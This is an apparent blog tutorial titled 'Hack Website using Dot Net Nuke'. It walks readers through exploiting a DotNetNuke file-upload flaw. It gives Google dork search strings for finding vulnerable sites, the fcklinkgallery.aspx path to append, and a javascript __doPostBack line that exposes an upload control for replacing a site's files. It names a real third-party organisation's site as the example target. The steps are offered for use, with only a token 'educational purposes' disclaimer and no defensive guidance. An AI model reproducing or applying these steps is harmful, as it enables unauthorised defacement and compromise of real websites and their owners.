Hack Website using Dot Net Nuke

Dot Net Nuke(DNN) is a open source platform for building websites based on Dot Net Technology.This is the easiest way to exploit any websites.Let see how it  works. Let's go...........

Step 1).Use the following String to find any vulnerable site (Enter this strings in www.google.com

to search).

inurl:"/portals/0"

OR

:inurl:/tabid/36/language/en-US/Default.aspx

You can customize this strings for finding vulnerability in any site for example

inurl:"/portals/0" yoursite.com 

 

Step 2). Put the following code or attach with the vulnerable site.

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

for example:

I found this site as a vulnerable site.

http://www.youthencounter.org

So after attaching the above code our exploitation link look like this.

http://www.youthencounter.org/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 3). Just go for this link in your browser you will see the Link Gallery section as you can see in the below image.

Step 4). Select the option File(A File On Your Site) and replace the URL bar with the following javascript.

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 5). After executing the above script you'll see another option for Uploading files(Browse) appears on your screen as you can see in the below image.

Step 6). Just browse for your files from your pc which you want to upload in this site.You can replace any files in website using this exploit such as banner, logo or header image, any picture or any text file or Any Thing.

**FOR EDUCATIONAL PURPOSES ONLY!,WE WOULD NOT TAKE ANY RESPONSIBILITY FOR ANY KIND OF ILLEGAL ACTIVITY FROM YOUR SIDE**

If you face any problem in this post please let me know your problem. To inform your problem you can leave a comment below. And if you like my post please click the Facebook like button or spread this post by clicking the Twitter, Facebook etc. icons below. Because, it will be a great support for me.